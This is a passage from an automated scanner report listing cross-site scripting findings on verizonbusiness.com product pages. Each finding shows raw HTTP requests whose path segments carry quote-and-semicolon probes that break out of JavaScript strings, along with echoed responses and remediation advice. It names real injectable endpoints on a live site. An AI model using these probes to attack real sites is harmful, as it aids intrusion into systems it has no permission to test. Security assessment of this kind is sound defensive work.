Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsec00a";0a9aa0a024a/it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.81. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd572'%3b321cd0f3a7a was submitted in the REST URL parameter 2. This input was echoed as bd572';321cd0f3a7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itbd572'%3b321cd0f3a7a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/itbd572';321cd0f3a7a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.82. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a90d3"%3bf4d3c13c800 was submitted in the REST URL parameter 2. This input was echoed as a90d3";f4d3c13c800 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ita90d3"%3bf4d3c13c800/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 42289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/ita90d3";f4d3c13c800/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.83. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3607'%3bc6e6fefe83 was submitted in the REST URL parameter 1. This input was echoed as c3607';c6e6fefe83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc3607'%3bc6e6fefe83/it/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsc3607';c6e6fefe83/it/cloud-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.84. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dfaa"%3b0c1a3f022e7 was submitted in the REST URL parameter 1. This input was echoed as 5dfaa";0c1a3f022e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5dfaa"%3b0c1a3f022e7/it/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products5dfaa";0c1a3f022e7/it/cloud-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.85. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 767e9"%3bd598a6842f was submitted in the REST URL parameter 2. This input was echoed as 767e9";d598a6842f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it767e9"%3bd598a6842f/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42303
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it767e9";d598a6842f/cloud-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.86. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54488'%3b5961a620681 was submitted in the REST URL parameter 2. This input was echoed as 54488';5961a620681 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it54488'%3b5961a620681/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42305
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it54488';5961a620681/cloud-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.87. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81829'%3b8859f1e65d7 was submitted in the REST URL parameter 3. This input was echoed as 81829';8859f1e65d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it81829'%3b8859f1e65d7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43031
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it81829';8859f1e65d7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.88. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39773"%3b09cb144275f was submitted in the REST URL parameter 3. This input was echoed as 39773";09cb144275f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it39773"%3b09cb144275f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43033
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it39773";09cb144275f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.89. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2c1'%3bcc59ecc5030 was submitted in the REST URL parameter 1. This input was echoed as 5c2c1';cc59ecc5030 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5c2c1'%3bcc59ecc5030/it/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products5c2c1';cc59ecc5030/it/cloud-it/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.90. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f62"%3b3ddf873d3a was submitted in the REST URL parameter 1. This input was echoed as 13f62";3ddf873d3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products13f62"%3b3ddf873d3a/it/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Date: Wed, 17 Nov 2010 00:40:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products13f62";3ddf873d3a/it/cloud-it/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.91. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a36"%3bebedaa16cf9 was submitted in the REST URL parameter 2. This input was echoed as 87a36";ebedaa16cf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it87a36"%3bebedaa16cf9/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it87a36";ebedaa16cf9/cloud-it/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.92. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31c'%3b407bf66b4dc was submitted in the REST URL parameter 2. This input was echoed as 9f31c';407bf66b4dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it9f31c'%3b407bf66b4dc/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it9f31c';407bf66b4dc/cloud-it/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.93. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ca5'%3b7c3a77074a8 was submitted in the REST URL parameter 3. This input was echoed as 60ca5';7c3a77074a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

